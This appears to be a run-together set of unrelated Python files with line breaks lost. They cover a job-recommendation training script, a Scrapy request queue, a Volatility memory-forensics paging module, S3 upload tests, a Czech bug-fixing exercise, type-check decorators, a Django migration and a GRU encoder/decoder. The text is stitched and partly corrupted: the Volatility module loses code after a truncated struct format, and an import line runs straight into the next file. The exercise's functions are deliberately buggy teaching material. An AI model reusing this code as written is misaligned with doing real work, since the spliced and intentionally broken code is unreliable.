output_dict[user].append(job_list[i]) with open(output_dir, 'w') as outfile: outfile.write("UserId, JobIds\n") for user, value in output_dict.items(): outfile.write(f'{str(user)},' + " ".join([str(x) for x in value]) + "\n") def split_train_test(df): return df.loc[df['Split'] == 'Train'], df.loc[df['Split'] == 'Test'] ### READ DATA data = pd.read_csv( "../../data/kaggle-job-recommendation/apps_with_item_user_data.tsv", sep = "\t" ) ### SAMPLE DATA - SUPPRESS WHEN LIVE # data = data.sample(10000) ### REFORMAT DATA # column names need to play ball with library data.rename(columns = { "UserID": "user", "JobID": "item", "Label": "label" }, inplace=True) # replace nan on int columns with 0 data['WorkHistoryCount'] = data['WorkHistoryCount'].fillna(0) data['TotalYearsExperience'] = data['TotalYearsExperience'].fillna(0) data['ManagedHowMany'] = data['ManagedHowMany'].fillna(0) # define types data = data.astype({ "user": int, "item": int, "label": int, "Split": str, "WindowID": int, "Title": str, "Popularity": int, "DegreeType": str, "Major": str, "WorkHistoryCount": int, "TotalYearsExperience": int, "ManagedHowMany": int }) # split train and test sets by WindowID # train_df, test_df = split_train_test_by_windowid(data) train_df, test_df = split_train_test(data) print(f"Shape of Train Set: {train_df.shape}") print(f"Shape of Test Set: {test_df.shape}") # define columns sparse_col = ["Title", "DegreeType", "Major"] dense_col = ["Popularity", "WorkHistoryCount", "TotalYearsExperience", "ManagedHowMany"] user_col = ["DegreeType", "Major", "WorkHistoryCount", "TotalYearsExperience", "ManagedHowMany"] item_col = ["Title", "Popularity"] # put data into format accepted by library train_data, data_info = DatasetFeat.build_trainset( train_df, user_col, item_col, sparse_col, dense_col ) test_data = DatasetFeat.build_testset(test_df) # sample negative items for each record train_data.build_negative_samples(data_info) test_data.build_negative_samples(data_info) ### CREATE AND TRAIN MODEL ytb_ranking = YouTubeRanking(task="ranking", data_info=data_info, embed_size=embed_size, n_epochs=n_epochs, lr=lr, batch_size=batch_size, use_bn=True, hidden_units=hidden_units) ytb_ranking.fit(train_data, verbose=2, shuffle=True, eval_data=test_data, metrics=["loss", "roc_auc", "precision", "recall", "map", "ndcg"]) ### MAKE PREDICTIONS output_user_id_list = [] output_job_id_list = [] for window_id in test_df['WindowID'].unique(): for user in list(set(test_df['user'][test_df['WindowID'] == window_id])): if user in list(set(train_df['user'])): for prediction in ytb_ranking.recommend_user( user = user, n_rec = 150, cold_start= "popular" ): output_user_id_list.append(user) output_job_id_list.append(prediction) # users = list(set(test_df['user'][test_df['WindowID'] == window_id])) # predictions = [ytb_ranking.recommend_user( # user = user, # n_rec = 150, # cold_start= "popular" # ) for user in users] # output_user_id_list.extend(users) # output_job_id_list.extend(predictions) generate_recommendation_output(output_user_id_list, output_job_id_list, "model_predictions/yt_recommender.csv") import logging from os_scrapy_rq_crawler.utils import HTTPRequestQueue, MemoryRequestQueue class AsyncRequestQueue(object): def __init__(self, crawler, mq, rq): self.crawler = crawler self.mq = mq self.rq = rq self.logger = logging.getLogger(self.__class__.__name__) async def qids(self, k=16): m = int(k / 2) qids = [] if len(self.mq) <= 0 else self.mq.qids(m if m else 1) if self.closing(): return qids r = k - len(qids) if r <= 0: return qids rqids = [] try: rqids = await self.rq.qids(r) except Exception as e: self.logger.error(f"qids {e}") if not rqids: return qids qids.extend(rqids) return set(qids) async def pop(self, qid=None): if self.mq.qsize(qid) > 0: return self.mq.pop(qid) if self.closing(): return None return await self.rq.pop(qid) def push(self, request): self.mq.push(request) def closing(self) -> bool: return bool(self.crawler.engine.slot.closing) def __len__(self): l = len(self.mq) if l > 0: return l if self.closing(): return 0 return 1 def close(self): self.mq.close() @classmethod def from_crawler(cls, crawler): settings = crawler.settings mq = MemoryRequestQueue() assert "RQ_API" in settings, "RQ_API not configured" api = settings.get("RQ_API") timeout = settings.getfloat("RQ_API_TIMEOUT", 3) rq = HTTPRequestQueue(api, timeout) return cls(crawler, mq, rq) williamclot/MemoryVisualizer # Volatility # Copyright (C) 2013 Volatility Foundation # # Authors: # # # This file is part of Volatility. # # Volatility is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # Volatility is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Volatility. If not, see . # import volatility.plugins.addrspaces.paged as paged import volatility.obj as obj import struct ptrs_page = 2048 entry_size = 8 pde_shift = 21 ptrs_per_pde = 512 page_shift = 12 ptrs_per_pae_pgd = 512 ptrs_per_pae_pte = 512 class AMD64PagedMemory(paged.AbstractWritablePagedMemory): """ Standard AMD 64-bit address space. This class implements the AMD64/IA-32E paging address space. It is responsible for translating each virtual (linear) address to a physical address. This is accomplished using hierachical paging structures. Every paging structure is 4096 bytes and is composed of entries. Each entry is 64 bits. The first paging structure is located at the physical address found in CR3 (dtb). Additional Resources: - Intel(R) 64 and IA-32 Architectures Software Developer's Manual Volume 3A: System Programming Guide. Section 4.3 http://www.intel.com/products/processor/manuals/index.htm - AMD64 Architecture Programmer's Manual Volume 2: System Programming http://support.amd.com/us/Processor_TechDocs/24593_APM_v2.pdf - , , , and , "FATKit: A Framework for the Extraction and Analysis of Digital Forensic Data from Volatile System Memory" ,Digital Investigation Journal 3(4):197-210, December 2006. (submitted February 2006) - , "Acquisition and Analysis of Windows Memory," University of Strathclyde, Glasgow, April 2006. - ., & ., & . "Windows Internals, 5th Edition", Microsoft Press, 2009. """ order = 60 pae = False checkname = 'AMD64ValidAS' paging_address_space = True minimum_size = 0x1000 alignment_gcd = 0x1000 _longlong_struct = struct.Struct("> 39 def get_pml4e(self, vaddr): ''' This method returns the Page Map Level 4 (PML4) entry for the virtual address. Bits 47:39 are used to the select the appropriate 8 byte entry in the Page Map Level 4 Table. "Bits 51:12 are from CR3" [Intel] "Bits 11:3 are bits 47:39 of the linear address" [Intel] "Bits 2:0 are 0" [Intel] ''' pml4e_paddr = (self.dtb & 0xffffffffff000) | ((vaddr & 0xff8000000000) >> 36) return self.read_long_long_phys(pml4e_paddr) def get_pdpi(self, vaddr, pml4e): ''' This method returns the Page Directory Pointer entry for the virtual address. Bits 32:30 are used to select the appropriate 8 byte entry in the Page Directory Pointer table. "Bits 51:12 are from the PML4E" [Intel] "Bits 11:3 are bits 38:30 of the linear address" [Intel] "Bits 2:0 are all 0" [Intel] ''' pdpte_paddr = (pml4e & 0xffffffffff000) | ((vaddr & 0x7FC0000000) >> 27) return self.read_long_long_phys(pdpte_paddr) def get_1GB_paddr(self, vaddr, pdpte): ''' If the Page Directory Pointer Table entry represents a 1-GByte page, this method extracts the physical address of the page. "Bits 51:30 are from the PDPTE" [Intel] "Bits 29:0 are from the original linear address" [Intel] ''' return (pdpte & 0xfffffc0000000) | (vaddr & 0x3fffffff) def pde_index(self, vaddr): return (vaddr >> pde_shift) & (ptrs_per_pde - 1) def pdba_base(self, pdpe): return pdpe & 0xFFFFFFFFFF000 def get_pgd(self, vaddr, pdpe): pgd_entry = self.pdba_base(pdpe) + self.pde_index(vaddr) * entry_size return self.read_long_long_phys(pgd_entry) def pte_index(self, vaddr): return (vaddr >> page_shift) & (ptrs_per_pde - 1) def ptba_base(self, pde): return pde & 0xFFFFFFFFFF000 def get_pte(self, vaddr, pgd): pgd_val = self.ptba_base(pgd) + self.pte_index(vaddr) * entry_size return self.read_long_long_phys(pgd_val) def pte_pfn(self, pte): return pte & 0xFFFFFFFFFF000 def get_paddr(self, vaddr, pte): return self.pte_pfn(pte) | (vaddr & ((1 << page_shift) - 1)) def vtop(self, vaddr): ''' This method translates an address in the virtual address space to its associated physical address. Invalid entries should be handled with operating system abstractions. ''' vaddr = long(vaddr) retVal = None pml4e = self.get_pml4e(vaddr) if not self.entry_present(pml4e): return None pdpe = self.get_pdpi(vaddr, pml4e) if not self.entry_present(pdpe): return retVal if self.page_size_flag(pdpe): return self.get_1GB_paddr(vaddr, pdpe) pgd = self.get_pgd(vaddr, pdpe) if self.entry_present(pgd): if self.page_size_flag(pgd): retVal = self.get_2MB_paddr(vaddr, pgd) else: pte = self.get_pte(vaddr, pgd) if self.entry_present(pte): retVal = self.get_paddr(vaddr, pte) return retVal def read_long_long_phys(self, addr): ''' This method returns a 64-bit little endian unsigned integer from the specified address in the physical address space. If the address cannot be accessed, then the method returns None. This code was derived directly from legacyintel.py ''' try: string = self.base.read(addr, 8) except IOError: string = None if not string: return obj.NoneObject("Unable to read_long_long_phys at " + hex(addr)) longlongval, = self._longlong_struct.unpack(string) return longlongval def get_available_pages(self, with_pte = False): ''' This method generates a list of pages that are available within the address space. The entries in are composed of the virtual address of the page and the size of the particular page (address, size). It walks the 0x1000/0x8 (0x200) entries in each Page Map, Page Directory, and Page Table to determine which pages are accessible. ''' # read the full pml4 pml4 = self.base.read(self.dtb & 0xffffffffff000, 0x200 * 8) if pml4 is None: return # unpack all entries pml4_entries = struct.unpack('<512Q', pml4) for pml4e in range(0, 0x200): vaddr = pml4e << 39 pml4e_value = pml4_entries[pml4e] if not self.entry_present(pml4e_value): continue pdpt_base = (pml4e_value & 0xffffffffff000) pdpt = self.base.read(pdpt_base, 0x200 * 8) if pdpt is None: continue pdpt_entries = struct.unpack('<512Q', pdpt) for pdpte in range(0, 0x200): vaddr = (pml4e << 39) | (pdpte << 30) pdpte_value = pdpt_entries[pdpte] if not self.entry_present(pdpte_value): continue if self.page_size_flag(pdpte_value): if with_pte: yield (pdpte_value, vaddr, 0x40000000) else: yield (vaddr, 0x40000000) continue pd_base = self.pdba_base(pdpte_value) pd = self.base.read(pd_base, 0x200 * 8) if pd is None: continue pd_entries = struct.unpack('<512Q', pd) prev_pd_entry = None for j in range(0, 0x200): soffset = (j * 0x200 * 0x200 * 8) entry = pd_entries[j] if self.skip_duplicate_entries and entry == prev_pd_entry: continue prev_pd_entry = entry if self.entry_present(entry) and self.page_size_flag(entry): if with_pte: yield (entry, vaddr + soffset, 0x200000) else: yield (vaddr + soffset, 0x200000) elif self.entry_present(entry): pt_base = entry & 0xFFFFFFFFFF000 pt = self.base.read(pt_base, 0x200 * 8) if pt is None: continue pt_entries = struct.unpack('<512Q', pt) prev_pt_entry = None for k in range(0, 0x200): pt_entry = pt_entries[k] if self.skip_duplicate_entries and pt_entry == prev_pt_entry: continue prev_pt_entry = pt_entry if self.entry_present(pt_entry): if with_pte: yield (pt_entry, vaddr + soffset + k * 0x1000, 0x1000) else: yield (vaddr + soffset + k * 0x1000, 0x1000) @classmethod def address_mask(cls, addr): return addr & 0xffffffffffff class WindowsAMD64PagedMemory(AMD64PagedMemory): """Windows-specific AMD 64-bit address space. This class is a specialized version of AMD64PagedMemory that leverages Windows-specific paging logic. """ order = 55 def is_valid_profile(self, profile): ''' This method checks to make sure the address space is being used with a Windows profile. ''' valid = AMD64PagedMemory.is_valid_profile(self, profile) return valid and profile.metadata.get('os', 'Unknown').lower() == 'windows' def entry_present(self, entry): present = AMD64PagedMemory.entry_present(self, entry) # The page is in transition and not a prototype. # Thus, we will treat it as present. return present or ((entry & (1 << 11)) and not (entry & (1 << 10))) class SkipDuplicatesAMD64PagedMemory(WindowsAMD64PagedMemory): """Windows 8/10-specific AMD 64-bit address space. This class is used to filter out large sections of kernel mappings that are duplicates in recent versions of Windows 8/10. """ order = 53 skip_duplicate_entries = True def is_valid_profile(self, profile): ''' This address space should only be used with recent Windows 8/10 profiles ''' valid = WindowsAMD64PagedMemory.is_valid_profile(self, profile) major = profile.metadata.get('major', 0) minor = profile.metadata.get('minor', 0) return valid and major >= 6 and minor >= 2 class LinuxAMD64PagedMemory(AMD64PagedMemory): """Linux-specific AMD 64-bit address space. This class is a specialized version of AMD64PagedMemory that leverages Linux-specific paging logic. """ order = 55 def is_valid_profile(self, profile): ''' This method checks to make sure the address space is being used with a Linux profile. ''' valid = AMD64PagedMemory.is_valid_profile(self, profile) return valid and profile.metadata.get('os', 'Unknown').lower() == 'linux' def entry_present(self, entry): present = AMD64PagedMemory.entry_present(self, entry) # Linux pages that have had mprotect(...PROT_NONE) called on them # have the present bit cleared and global bit set return present or (entry & (1 << 8)) tests/integration/test_target_s3_csv.py import json import unittest import simplejson from nose.tools import assert_raises import target_s3_csv from target_s3_csv import s3 try: import tests.utils as test_utils except ImportError: import utils as test_utils class TestIntegration(unittest.TestCase): """ Integration Tests """ maxDiff = None def setUp(self): self.config = test_utils.get_test_config() s3.setup_aws_client(self.config) def assert_three_streams_are_in_s3_bucket(self, should_metadata_columns_exist=False, should_hard_deleted_rows=False, compression=None, delimiter=',', quotechar='"'): """ This is a helper assertion that checks if every data from the message-with-three-streams.json file is available in S3. Useful to check different loading methods (compressed, encrypted, custom delimiter and quotechar, etc.) without duplicating assertions """ # TODO: This assertion function is currently a template and not implemented # Here We should download files from S3 and compare to expected results based on the input # parameters self.assertTrue(True) def persist_messages(self, messages): """Load data into S3""" target_s3_csv.persist_messages(messages, self.config) def test_invalid_json(self): """Receiving invalid JSONs should raise an exception""" tap_lines = test_utils.get_test_tap_lines('invalid-json.json') with assert_raises(simplejson.scanner.JSONDecodeError): self.persist_messages(tap_lines) def test_message_order(self): """RECORD message without a previously received SCHEMA message should raise an exception""" tap_lines = test_utils.get_test_tap_lines('invalid-message-order.json') with assert_raises(Exception): self.persist_messages(tap_lines) def test_loading_csv_files(self): """Loading multiple tables from the same input tap with various columns types""" tap_lines = test_utils.get_test_tap_lines('messages-with-three-streams.json') self.persist_messages(tap_lines) self.assert_three_streams_are_in_s3_bucket() def test_loading_csv_files_with_gzip_compression(self): """Loading multiple tables from the same input tap with gzip compression""" tap_lines = test_utils.get_test_tap_lines('messages-with-three-streams.json') # Turning on gzip compression self.config['compression'] = 'gzip' self.persist_messages(tap_lines) self.assert_three_streams_are_in_s3_bucket(compression='gzip') def test_loading_csv_files_with_invalid_compression(self): """Loading multiple tables from the same input tap with invalid compression""" tap_lines = test_utils.get_test_tap_lines('messages-with-three-streams.json') # Turning on a not supported compression method self.config['compression'] = 'INVALID_COMPRESSION_METHOD' # Invalid compression method should raise exception with assert_raises(NotImplementedError): self.persist_messages(tap_lines) def test_naming_convention(self): tap_lines = test_utils.get_test_tap_lines('messages-with-three-streams.json') self.config['naming_convention'] = "tester/{stream}/{timestamp}.csv" self.persist_messages(tap_lines) self.assert_three_streams_are_in_s3_bucket() #!/usr/bin/python3 import sys ########################### # Dotaz studenta: # # ########################### # Chcete-li dostat odpoved, vlozte do nazvu souboru heslo KONTROLA. # Tento program obsahuje velke mnozstvi chyb ruznych typu. # # Vasim ukolem je projit kod a opravit jej tak, # abyste vsechny chyby odstranili. # # Testy nemodifikujte, jsou jen pro kontrolu a to, ze vsechny # projdou neznamena, ze je vas kod bez chyby. # # Opravujte jen funkce, ktere maji v komentari TODO. # TODO: opravit tuto funkci def is_string_palindrom(string): """Testuje, zdali je zadany retezec (string) palindrom a to bez pouziti funkce reverse. Vraci True v pripade, ze je palindrom, jinak False. """ if string is None: return False i = 0 while i < len(string): if string[i] == string[len(string) -1 - i]: i+=1 continue else: return False return True class Node: """Trida Node slouzi pro reprezentaci objektu v jednosmerne spojovanem seznamu. Atributy: value reprezentuje ulozenou hodnotu/objekt next reference na nasledujici prvek v seznamu """ def __init__(self): self.value = None self.next = None class LinkedList: """Trida LinkedList reprezentuje spojovany seznam. Atributy: first reference na prvni prvek seznamu """ def __init__(self): self.first = None # TODO: opravit tuto funkci def insert(linked_list, value): """Funkce insert vklada na konec seznamu (linked_list) novy uzel s danou hodnotou (value). Vraci referenci na novy uzel seznamu. """ n = Node() n.value = value tmp = linked_list.first if linked_list.first is None: linked_list.first = n else: while tmp.next: tmp = tmp.next tmp.next = n return n # TODO: opravit tuto funkci def delete_key(linked_list, key): """Funkce delete_key smaze prvni vyskyt klice (key) v seznamu (linked_list). Vrati False pokud klic nebyl nalezen, True jinak. """ node = linked_list.first previous = None while node is not None and node.value != key: previous = node node = node.next if node is None: return False if previous is None : linked_list.first = node.next else: previous.next = node.next return True # TODO: opravit tuto funkci def multiply_numbers(bound, numbers): """Funkce vypocita soucin cisel v poli numbers, jejichz hodnota je z intervalu 1 az bound (vcetne). Pokud se v poli zadna takova cisla nenachazeji, vrati 1. Parametry: bound horni hranice intervalu pro hodnotu cisel, ktera se zapocitavaji do vysledku numbers pole cisel k pocitani soucinu """ array = [0 for i in range(bound)] for i in range(len(numbers)): array[numbers[i]] += 1 val = 1 for i in range(len(array)): for j in range(array[i]): val *= i return val # TODO: opravit tuto funkci def has_correct_parentheses(string): """Funkce otestuje, zdali zadany retezec obsahuje spravne ozavorkovani, tedy pred kazdou uzaviraci zavorkou musi byt prislusna oteviraci. Resi se pouze zavorky ( ). Vraci True v pripade spravneho ozavorkovani, jinak False. """ opened = 0 for i in range(len(string)): if string[i] == '(': opened += 1 if string[i] == ')': opened -= 1 if opened == 0: return True return False # TODO: opravit tuto funkci def sequence_sum(sequence): """Funkce secte "sumu" posloupnosti (sequence) a to tak, ze pokud je cislo vetsi nez predchazejici (sequence[n] > sequence[n-1]), tak ho pricte k "sume", pokud je sequence[n] < sequence[n-1], tak ho odecte a pokud je stejne, tak ho preskoci. Prvni cislo se nezapocita. """ strange_sum = 0 for i in range(len(sequence)): if sequence[i] > sequence[i-1]: strange_sum += sequence[i] if sequence[i] < sequence[i-1]: strange_sum -= sequence[i] return strange_sum # TODO: opravit tuto funkci def find_substring(string, substring): """Funkce hleda podretezec (substring) v retezci (string). Pokud se podretezec v retezci nachazi, vrati index prvniho vyskytu. Jinak vraci -1. """ if len(substring) > len(string): return -1 j = 1 i = 1 while i < len(string): if string[i] == substring[j]: if j == (len(substring) - 1): return i - j j += 1 i += 1 return -1 # Testy implmentace def test_palindrom(): print("Test 1: je \"abccba\" palindrom?") try: res = is_string_palindrom("abccba") if res: print("OK.") else: print("NOK, \"abccba\" je palindrom, ale program vraci 0.") except IndexError as e: print("NOK: pristup mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 2: je \"abcba\" palindrom?") try: res = is_string_palindrom("abcba") if res: print("OK.") else: print("NOK, \"abcba\" je palindrom, ale program vraci 0.") except IndexError as e: print("NOK: pristup mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 3: je \"abcabc\" palindrom?") try: res = is_string_palindrom("abcabc") if res: print("NOK, \"abcabc\" neni palindrom, ", end="") print("ale program vraci 1.") else: print("OK.") except IndexError as e: print("NOK: pristup mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) def test_list(): try: l1 = LinkedList() l1.first = None print("Test 4: vkladani 1. prvku do listu.") tmp1 = insert(l1, 1) if tmp1.value == 1 and l1.first is tmp1 and tmp1.next is None: print("OK.") else: print("NOK, vlozeni prvniho prvku neprobehlo v poradku, ", end="") print("zkontrolujte, zdali je spravne nastavena hodnota ", end="") print("a reference next.") except AttributeError as e: print("NOK: spatna prace s pameti.") print("Chybova hlaska Pythonu: {}".format(e)) try: print("Test 5: vkladani 2. prvku do listu.") l2 = LinkedList() tmp21 = insert(l2, 1) tmp22 = insert(l2, 2) if (tmp22.value == 2 and l2.first is tmp21 and tmp22.next is None and tmp21.next is tmp22): print("OK.") else: print("NOK, vlozeni druheho prvku neprobehlo v poradku, ", end="") print(" zkontrolujte, zdali je spravne nastavena hodnota", end="") print(" a reference next.") except AttributeError as e: print("NOK: spatna prace s pameti.") print("Chybova hlaska Pythonu: {}".format(e)) try: print("Test 6.1: odstraneni 2. prvku z listu.") l3 = LinkedList() tmp31 = insert(l3, 1) tmp32 = insert(l3, 2) if delete_key(l3, 2) and tmp31.next is None: print("OK.") else: print("NOK, neodstranili jste prvek, ", end="") print("muze to byt dano i spatnym vkladanim.") except AttributeError as e: print("NOK: spatna prace s pameti.") print("Chybova hlaska Pythonu: {}".format(e)) try: print("Test 6.2: odstraneni prvku z prazdneho listu.") l3 = LinkedList() if delete_key(l3, 2): print("NOK, odstranili jste prvek z prazdneho listu ", end="") print("a nebo vratili True") else: print("OK.") except AttributeError as e: print("NOK: spatna prace s pameti.") print("Chybova hlaska Pythonu: {}".format(e)) try: print("Test 6.3: odstraneni chybejiciho prvku z listu.") l3 = LinkedList() tmp31 = insert(l3, 1) tmp32 = insert(l3, 2) if delete_key(l3, 4): print("NOK, odstranili jste prvek, ktery v listu nebyl ", end="") print("a nebo vratili True") else: print("OK.") except AttributeError as e: print("NOK: spatna prace s pameti.") print("Chybova hlaska Pythonu: {}".format(e)) def test_multiply_numbers(): print("Test 7: multiply_numbers(1, [1, 1, 1])") try: res = multiply_numbers(1, [1, 1, 1]) if res is not 1: print("NOK: {} != 1".format(str(res))) else: print("OK.") except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 8: multiply_numbers(2, [3, 3, 3])") try: res = multiply_numbers(2, [3, 3, 3]) if res is not 1: print("NOK: {} != 1".format(str(res))) else: print("OK.") except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 9: multiply_numbers(3, [1, 1, 2])") try: res = multiply_numbers(3, [1, 1, 2]) if res is not 2: print("NOK: {} != @".format(str(res))) else: print("OK.") except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 10: multiply_numbers(3, [1, 4, 3])") try: res = multiply_numbers(3, [1, 4, 3]) if res is not 3: print("NOK: {} != 3".format(str(res))) else: print("OK.") except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 11: multiply_numbers(4, [3, 3, 3, 2])") try: res = multiply_numbers(4, [3, 3, 3, 2]) if res is not 54: print("NOK: " + str(res) + " != 54") else: print("OK.") except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 12: multiply_numbers(3, [3, 3, 4])") try: res = multiply_numbers(3, [3, 3, 4]) if res is not 9: print("NOK: {} != 9".format(str(res))) else: print("OK.") except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) def test_brackets(): print("Test 13: zavorkovani na \"()\"") try: if has_correct_parentheses("()"): print("OK.") else: print("NOK, \"()\" je spravne uzavorkovani a funkce vrati False") except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 14: zavorkovani na \")(\"") try: if has_correct_parentheses(")("): print("NOK, \")(\" neni spravne uzavorkovani a funkce vrati True") else: print("OK.") except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 15: zavorkovani na \"aaa\"") try: if has_correct_parentheses("aaa"): print("OK.") else: print("NOK, \"aaa\" je spravne uzavorkovani a funkce vrati False") except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 16: zavorkovani na \"((\"") try: if has_correct_parentheses("(("): print("NOK, \"((\" neni spravne uzavorkovani a funkce vrati True") else: print("OK.") except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) def test_sequence_sum(): print("Test 17: sequence_sum([1, 2, 3])") try: res = sequence_sum([1, 2, 3]) if res == 5: print("OK.") else: print("NOK, sequence_sum([1, 2, 3]) je 5 ", end="") print("a vam vyslo {}".format(str(res))) except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 18: sequence_sum([1, 2, 1])") try: res = sequence_sum([1, 2, 1]) if res == 1: print("OK.") else: print("NOK, sequence_sum([1, 2, 1]) je 1 ", end="") print("a vam vyslo {}".format(str(res))) except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 18: sequence_sum([1,2,2])") try: res = sequence_sum([1, 2, 2]) if res == 2: print("OK.") else: print("NOK, sequence_sum([1, 2, 2]) je 2 ", end="") print("a vam vyslo {}".format(str(res))) except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) def test_find(): print("Test 19: je v \"abc\" podretezec \"abc\"?") try: res = find_substring("abc", "abc") if res == 0: print("OK.") else: print("NOK, podretezec je na pozici 0, ", end="") print("vy vracite {}".format(str(res))) except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 20: je v \"abc\" podretezec \"b\"?") try: res = find_substring("abc", "b") if res == 1: print("OK.") else: print("NOK, podretezec je na pozici 1, ", end="") print("vy vracite {}".format(str(res))) except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 21: je v \"abc\" podretezec \"abb\"?") try: res = find_substring("abc", "abb") if res == -1: print("OK.") else: print("NOK, podretezec zde neni, vy vracite {}".format(str(res))) except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) print("Test 22: je v \"aaab\" podretezec \"aab\"?") try: res = find_substring("aaab", "aab") if res == 1: print("OK.") else: print("NOK, podretezec je na pozici 1, ", end="") print("vy vracite {}".format(str(res))) except IndexError as e: print("NOK: pristupovani mimo pole.") print("Chybova hlaska Pythonu: {}".format(e)) if __name__ == '__main__': test_palindrom() test_list() test_multiply_numbers() test_brackets() test_sequence_sum() test_find() print("Testy netestuji vse. Pokud vam tedy prosly vsude na OK,") print("neznamena to, ze mate bezchybnou implementaci. To, ze") print("je nejaky test NOK ale znamena, ze mate neco spatne.")#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Fri Aug 25 14:55:27 2017 @author: misakawa """ class Typedef: def __init__(self, type_, error_msg = "Type of {return_or_input} {idx_or_key} should be {type}." ): self.type_ = type_ self.error_msg = error_msg def set_lambda(self, dual_callable_obj): self.check = lambda input_var: dual_callable_obj(input_var, self.type_) return self NEq = lambda type_: Typedef(type_, error_msg="Type of {return_or_input} {idx_or_key} shouldn't be {type}.").set_lambda( lambda input_var, input_type : not isinstance(input_var, input_type) ) Or = lambda *type_:Typedef(type_, error_msg="Type of {return_or_input} {idx_or_key} should be in {type}").set_lambda( lambda input_var, input_type: input_var.__class__ in input_type ) def error_helper(template_msg, **kwargs): template = template_msg+'\n'+"The type of current input {return_or_input} is {input_var_type}." return template.format(**kwargs) def _check(input_var, check_type, idx = None, key = None, ret = None): return_or_input = lambda :"return" if ret else "argument" error_render = lambda :dict(idx_or_key = key if key else idx, return_or_input = return_or_input(), type = _type, input_var_type = input_var.__class__) if isinstance(check_type, Typedef): _type = check_type.type_ if not check_type.check(input_var): raise TypeError(error_helper(check_type.error_msg, **error_render())) else: _type = check_type if not isinstance(input_var, check_type): raise TypeError(error_helper("Type of {return_or_input} {idx_or_key} should be {type}.", **error_render())) class strict: def __new__(self): return strict def args(*typeargs : "*[, typearg]" , **typekwargs : "**dict(, kw = arg)"): def _1(func): def _2(*args, **kwargs): for arg_idx, (arg,typearg) in enumerate(zip(args, typeargs)): try: _check(arg, typearg, idx=arg_idx) except TypeError as e: raise TypeError(e) for key in kwargs: try: _check(kwargs[key], typekwargs[key], key=key) except TypeError as e: raise TypeError(e) return func(*args,**kwargs) return _2 return _1 def ret(*typerets : "*[, typearg]"): def _1(func): def _2(*args, **kwargs): ret = func(*args, **kwargs) if len(typerets) > 1: for ret_idx,(ret_i, typeret) in enumerate(zip(ret, typerets)): try: _check(ret_i, typeret, idx=ret_idx) except TypeError as e: raise TypeError(e) else: try: _check(ret, typerets[0], idx=0) except TypeError as e: raise TypeError(e) return ret return _2 return _1 # Generated by Django 2.0.4 on 2018-07-30 09:30 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Address', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('raw', models.CharField(blank=True, max_length=400, null=True)), ('raw2', models.CharField(blank=True, max_length=400, null=True)), ('address_line', models.CharField(blank=True, max_length=400, null=True)), ('city_state', models.CharField(blank=True, max_length=400, null=True)), ('lat', models.FloatField(blank=True, null=True, verbose_name='lat')), ('lng', models.FloatField(blank=True, null=True, verbose_name='lng')), ], ), migrations.CreateModel( name='AddressComponent', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('long_name', models.CharField(max_length=400)), ('short_name', models.CharField(max_length=400)), ], ), migrations.CreateModel( name='AddressComponentType', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=100)), ], ), migrations.AddField( model_name='addresscomponent', name='types', field=models.ManyToManyField(to='google_address.AddressComponentType'), ), migrations.AddField( model_name='address', name='address_components', field=models.ManyToManyField(to='google_address.AddressComponent'), ), ] from .efficientnetv2 import effnetv2_l, effnetv2_m, effnetv2_xl, effnetv2_simport torch import torch.nn as nn class EncoderRNN(nn.Module): def __init__(self, input_size, num_hidden): super(EncoderRNN, self).__init__() self.num_hidden = num_hidden self.input_size = input_size self.encoder1 = nn.GRUCell(input_size, self.num_hidden) def forward(self, input): context = torch.zeros( input.size(0), self.num_hidden, dtype=torch.float, device=input.device ) forecast_sequence = input.size()[1] for i in range(forecast_sequence): inp = input[:, i, :] context = self.encoder1(inp, context) return context class DecoderRNN(nn.Module): def __init__(self, input_size, output_size, num_hidden, use_embedding=False): super(DecoderRNN, self).__init__() self.num_hidden = num_hidden self.input_size = input_size self.output_size = output_size self.use_embedding = use_embedding self.decoder1 = nn.GRUCell(int(self.num_hidden / 2), self.num_hidden) h = self.num_hidden if use_embedding else self.num_hidden // 2 self.decoder2 = nn.GRUCell(h, self.num_hidden) self.fc_in = nn.Linear(self.num_hidden, self.input_size) self.fc_out = nn.Linear(self.num_hidden, self.output_size) 